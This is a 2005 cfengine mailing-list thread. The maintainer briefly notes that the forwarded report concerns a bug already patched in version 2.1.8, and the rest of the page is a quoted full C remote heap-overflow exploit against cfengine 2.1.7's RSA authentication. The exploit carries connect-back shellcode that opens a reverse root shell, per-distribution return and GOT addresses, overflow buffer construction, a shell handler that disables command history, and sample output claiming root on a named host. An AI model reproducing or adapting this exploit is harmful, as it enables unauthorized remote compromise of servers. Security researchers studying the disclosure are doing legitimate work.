help-cfengine
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: cfengine rsa heap remote exploit: part of PTjob project (fwd)


From: Mark Burgess
Subject: Re: cfengine rsa heap remote exploit: part of PTjob project (fwd)
Date: Mon, 21 Feb 2005 08:15:07 +0100

This is not enough information to go on. Where does this come from and
when did it appear? It appears to be old. (2.1.7). In that case it
refers to a bug that was patched in 2.1.8.  More information please.


Mark

On Mon, 2005-02-21 at 16:37 +1100, Tim Nelson wrote:
>       I presume most of you saw this, but I'm forwarding it just in 
> case.
> 
>       :)
> 
> -- 
> Tim Nelson
> Server Administrator
> WebAlive Technologies Global
> Level 1 Innovation Building, Digital Harbour
> 1010 LaTrobe Street
> Docklands, Melbourne, 
> Vic, 3008
> Phone: +61 3 9934 0812
> Fax: +61 3 9934 0899
> E-mail: address@hidden
> http://www.webalive.biz/
> 
> "Your Business, Your Web, Your Control"
> 
> ---------- Forwarded message ----------
> Date: 19 Feb 2005 13:16:50 -0000
> From: yan feng <address@hidden>
> To: address@hidden
> Subject: cfengine rsa heap remote exploit:   part of PTjob project
> 
> 
> 
> 
> /*           _ ________            _____                        ______
>   *
>   * cfengine rsa heap remote exploit  part of PTjob project / \  / "fuck mm"
>   * by jsk:exworm(http://exworm.hostrocket.com)            \/
>   * bug found by core
>   * yep ta mei dayong ..hehe..so pub it..
>   * my home: www.ph4nt0m.org
>   * GT: emm.oyxin.seal.ava.haggis.b_root.more..
>   * No girl No money  No jop...
>   * bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23
>   * cfengine rsa heap remote exploit ....s
>   * --------------------------------------------------(need 
> money.to..fk..girl..)
>   * [+] lisntener...
>   * [+] Connected, sending code...
>   * [+] Ret: 0x0819f03e
>   * [+] Got: 0x0811a590
>   * [+] ownedbyOseen!
>   * -----------------------------------------------------------
>   * Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
>   * uid=0(root) gid=0(root) 
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
>   *(wheel)
>   *
>   *
>   */
> 
> #include <stdio.h>
> #include <stdarg.h>
> #include <stdlib.h>
> #include <netdb.h>
> #include <net/if.h>
> #include <netinet/in.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <sys/ioctl.h>
> #include <sys/time.h>
> #include <netinet/in.h>
> #include <getopt.h>
> #include <unistd.h>
> #include <string.h>
> #include <arpa/inet.h>
> #include <errno.h>
> #include <linux/sockios.h>
> 
> #define BUF 1024
> 
> 
> struct {
>          char *distro;
>          char *type;
>          unsigned long ret;
>          unsigned long got;
> 
> } targets[] = { /*got is free of rsafree() ,get it by yourself to own more 
> machine ;) */
>          { "Redhat 7.3 ", "cfengine 2.1.7p1  ",0x0819f03e , 0x0811a590 },
>          { "redhat 9.0  ", "cfengine 2.1.7p1", **********, ********** },  ( 
> hehe:use fast-bin tips)
>          { "Redhat  7.2  ", "cfengine 2.17p1 ", 0x080d1c78, 0x0806d0e3 },
>          { "Redhat 7.1     ", "cfengine 2.17p1", 0x080d11e0, 0x082bc090 },
>          { "Crash          ", "(All platforms)  ", 0x42424242, 0x41414141 },
> };
> char linux_connect_back[] =  /* connect back 45295 */
>   "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
>          "\x06\x51\xb1\x01\x51\xb1\x02\x51"
>          "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
>          "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
>          "\x68\x41\x42\x43\x44\x66\x68\xb0"
>          "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
>          "\x10\x53\x57\x52\x89\xe1\xb3\x03"
>          "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
>          "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
>          "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
>          "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
>          "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
>          "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
>          "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
>          "\x2f\x62\x69\x89\xe3\x50\x53\x89"
>          "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
>          "\x01\xcd\x80";
> int sock;
> void usage();
> void shell();
> 
> 
> 
> 
> void
> usage(char *prog)
> {
> 
>        fprintf(stderr,"Usage: %s -t [-pah]\n",prog);
>          fprintf(stderr,"-t version       Linux version.\n");
>          fprintf(stderr,"-h target       The host to attack.\n");
>        fprintf(stderr,"-a password     Default password is \"sorry no 
> password. \".\n");
>          fprintf(stderr,"-p port         Default port is 5803.\n\n");
> }
> 
> int
> openhost(char *host,int port)
> {
>          struct sockaddr_in addr;
>          struct hostent *he;
> 
>          he=gethostbyname(host);
> 
>          if (he==NULL) return -1;
>          sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
>          if (sock==-1) return -1;
> 
>          memcpy(&addr.sin_addr, he->h_addr, he->h_length);
> 
>          addr.sin_family=AF_INET;
>          addr.sin_port=htons(port);
> 
>          if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
>          sock=-1;
>          return sock;
> }
> 
> 
> void
> shell(int sock)
> {
>          fd_set  fd_read;
>          char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; 
> echo '*** oseen are chinese...'\n";
>          int n;
> 
>          FD_ZERO(&fd_read);
>          FD_SET(sock, &fd_read);
>          FD_SET(0, &fd_read);
> 
>          send(sock, cmd, strlen(cmd), 0);
> 
>          while(1) {
>                  FD_SET(sock, &fd_read);
>                  FD_SET(0,    &fd_read);
> 
>                  if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;
> 
>                  if (FD_ISSET(sock, &fd_read)) {
>                          if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
>                                  fprintf(stderr, "[+] EOF\n");
>                                  exit(2);
>                          }
> 
>                          if (write(1, buff, n) <0) break;
>                  }
> 
>                  if (FD_ISSET(0, &fd_read)) {
>                          if ((n = read(0, buff, sizeof(buff))) < 0){
>                                  fprintf(stderr,"[+] EOF\n");
>                                  exit(2);
>                          }
> 
>                          if (send(sock, buff, n, 0) < 0) break;
>                  }
>          }
> 
>          fprintf(stderr,"[+] Connection lost.\n\n");
>          exit(0);
> }
> 
> unsigned char
> *get_my_ip_addr(int sockfd, struct ifreq *ifr)
> {
>       struct sockaddr_in sin;
>       char *b = (char *) malloc(4);
> 
>       if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
>                  fprintf(stderr, "Unable to get the local IP Address, use 
> -d.\n");
>               exit(1);
>          }
> 
>       memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
>       memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
>       return b;
> }
> 
> 
> 
> 
> 
> int
> main (int argc,char *argv[])
> {
>          char buf1[512];
>          char buf2[512];
>          char host[256];
>          char pass[256]="changeme";
>          char data;
> 
> 
> 
>          int  type= 0;
>          int c=0;
>          int port=8001;
>          char device[256] = "eth0";
>       unsigned char *ptr;
> 
>          struct hostent *hp;
>          struct sockaddr_in sin_listener;
>       struct ifreq ifr;
>          struct timeval timeout;
> 
>          fd_set fdread;
> 
>       int delay       = 12;
>          int i           = 0;
>       int mode        = 0;
>       int local_port  = 0;
>          int opt         = 0;
>          int ret      = 0;
>       int sin_len     = sizeof (struct sockaddr_in);
>          int sock        = 0;
>       int sock2       = 0;
>       int sockd       = 0;
>          int listener = 0;
>       int time_out    = 4;
>       int tmp         = 0;
> 
>          srand(getpid());
> 
>          fprintf(stdout,"cfengine rsa heap remote exploit ....s\n");
>          
> fprintf(stdout,"--------------------------------------------------(need 
> money.to..fk..girl..)\n");
> 
>          while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
>          {
>                  switch(c)
>                  {
>                          case 'p':
>                                  port=atoi(optarg);
>                                  if ((port <= 0) || (port > 65535)) {
>                                          fprintf(stderr,"Invalid port.\n\n");
>                                          exit(1);
>                                  }
>                                  break;
>                          case 'a':
>                                  memset(pass,0x0,sizeof(pass));
>                                  strncpy(pass,optarg,sizeof(pass) - 1);
>                                  break;
>                          case 't':
>                                  type = atoi(optarg);
>                                  if (type == 0 || type > sizeof(targets) / 
> 28) {
>                                          for(i = 0; i < sizeof(targets) / 28; 
> i++)
>                                          fprintf(stderr, "%02d. %s - %s      
> [0x%08x - 0x%08x]\n",
>                                                  i + 1, targets[i].distro, 
> targets[i].type, targets[i].ret, targets[i].got);
>                                          return -1;
>                                  }
>                                  break;
>                          case 'h':
>                                  memset(host,0x0,sizeof(host));
>                                  strncpy(host,optarg,sizeof(host) - 1);
>                                  break;
> 
>                          default:
>                                  usage(argv[0]);
>                                  exit(1);
>                                  break;
>                  }
>          }
> 
>          timeout.tv_sec = time_out;
>          timeout.tv_usec = 0;
> 
>          if (strlen(host) == 0) {
>                  usage(argv[0]);
>                  exit(1);
>          }
>          sock=openhost(host, 5308);
> 
>          if (sock==-1) {
>                  fprintf(stderr,"- Unable to connect.\n\n");
>                  exit(1);
>          }
> 
>       strncpy(ifr.ifr_name, device, 15);
> 
>          if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
>                  fprintf(stderr, "socket() error.\n");
>                  return -1;
>          }
> 
>          if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
>                  fprintf(stderr, "socket() error.\n");
>                  return -1;
>          }
> 
>       ptr = get_my_ip_addr(sockd, &ifr);
>         memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);
> 
>          sin_listener.sin_family = AF_INET;
>       memset(&sin_listener.sin_zero, 0x00, 8);
> 
>          while(1) {
>                  local_port = local_port = 45295;
>                  sin_listener.sin_port = htons(local_port);
>                  if (!bind(listener, (struct sockaddr *) &sin_listener, 
> sin_len)) break;
>          }
> 
> 
> 
>       listen(listener, 1);
>          fprintf(stdout, "[+] lisntener...\n");
>          linux_connect_back[33] = (unsigned int) *(ptr + 0);
>          linux_connect_back[34] = (unsigned int) *(ptr + 1);
>          linux_connect_back[35] = (unsigned int) *(ptr + 2);
>          linux_connect_back[36] = (unsigned int) *(ptr + 3);
> 
> 
> 
>          memset(buf2,  0x0, sizeof(buf2));
>          memset(buf1, 0x90, sizeof(buf1));
> 
>          for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = 
> linux_connect_back[i];
> 
>          buf1[0] = (0x41414141 & 0x000000ff);
>          buf1[1] = (0x41414141 & 0x0000ff00) >> 8;
>          buf1[2] = (0x41414141 & 0x00ff0000) >> 16;
>          buf1[3] = (0x41414141 & 0xff000000) >> 24;
> 
>          buf1[4] = (0x58585858 & 0x000000ff);
>          buf1[5] = (0x58585858 & 0x0000ff00) >> 8;
>          buf1[6] = (0x58585858 & 0x00ff0000) >> 16;
>          buf1[7] = (0x58585858 & 0xff000000) >> 24;
> 
>          buf1[8] = (0xfffffffc & 0x000000ff);
>          buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;
>          buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;
>          buf1[11] = (0xfffffffc & 0xff000000) >> 24;
> 
>          buf1[12] = (0xffffffff & 0x000000ff);
>          buf1[13] = (0xffffffff & 0x0000ff00) >> 8;
>          buf1[14] = (0xffffffff & 0x00ff0000) >> 16;
>          buf1[15] = (0xffffffff & 0xff000000) >> 24;
> 
>          buf1[16] = (targets[type - 1].got -12 & 0x000000ff);
>          buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;
>          buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;
>          buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;
> 
>          buf1[20] = (targets[type - 1].ret & 0x000000ff);
>          buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;
>          buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;
>          buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;
> 
> 
>        for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)
>        {
>          buf1[i + 24] = 0x7f;
>          buf1[i + 25] = 0xeb;
>        }
>        for(; i < 300 - sizeof(linux_connect_back) - 1; i++)
>          buf1[i + 24] = 0x90;
>        strcpy(buf1 + i + 24, linux_connect_back);
>        buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\n';
>        buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\0';
> 
> 
> 
>        sprintf(buf2,   "k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH 
> n00000010 00001000%s\r\n", buf1);
> 
>          fprintf(stdout, "Connected, sending code...\n");
>          fprintf(stdout, "[+] Ret: 0x%08x\n", targets[type - 1].ret);
>          fprintf(stdout, "[+] Got: 0x%08x\n", targets[type - 1].got);
>   while(1) {
>                  write(sock, buf2, strlen(buf2));
>                  close(sock);
>                  sleep(2);
>                  FD_ZERO(&fdread);
>               FD_SET(listener, &fdread);
> 
>               timeout.tv_sec = time_out;
>               timeout.tv_usec = 0;
> 
>               while(1) {
> 
>                       ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);
> 
>                       if (ret < 0) {
>                               close(sock);
>                               close(listener);
>                               fprintf(stderr, "select() error.\n");
>                               return -1;
>                       }
> 
>                       if (ret == 0) {
>                               fprintf(stderr, "[+] Failed, waiting %d 
> seconds.\n"
>                                               "[+] Use ctrl-c to abort.\n", 
> delay);
>                               sleep(delay);
>                               break;
>                       }
> 
>                       if(FD_ISSET(listener, &fdread)) {
>                               sock2 = accept(listener, (struct sockaddr 
> *)&sin_listener, &sin_len);
>                               close(sock);
>                               close(listener);
> 
>                               fprintf(stderr, "[+] ownedbyOseen!\n"
>                                               
> "-----------------------------------------------------------\n");
>                               shell(sock2);
>                               close(sock2);
>                               return 0;
>                       }
>               }
> 
>       }
> 
>       fprintf(stderr, "[+] Exploit failed.\n");
>       close(listener);
>       close(sock);
>       return 0;
> 
> }
> 
> 
> _______________________________________________
> Help-cfengine mailing list
> address@hidden
> http://lists.gnu.org/mailman/listinfo/help-cfengine





reply via email to

[Prev in Thread] Current Thread [Next in Thread]